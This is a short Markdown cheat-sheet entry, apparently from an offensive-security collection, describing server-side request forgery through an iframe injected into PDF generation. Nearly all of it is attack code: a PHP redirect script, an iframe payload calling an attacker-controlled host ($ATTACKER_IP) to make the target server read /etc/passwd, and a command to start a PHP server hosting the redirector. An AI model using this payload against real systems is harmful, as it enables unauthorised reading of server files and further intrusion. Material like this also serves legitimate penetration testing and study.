killchain-compendium/Exploits/Web/Iframe.md

23 lines
529 B
Markdown
Raw Normal View History

2022-11-13 22:38:01 +01:00
# SSRF through iframe
* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
```php
<?php
$loc = "http://127.0.0.1/";
if(isset($_GET['a'])){
$loc = $_GET['a'];
}
header('Location: '.$loc);
?>
```
* Payload looks like this
```html
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
```
* Start a php adhoc server and run it
```php
php -S 0.0.0.0:4711
```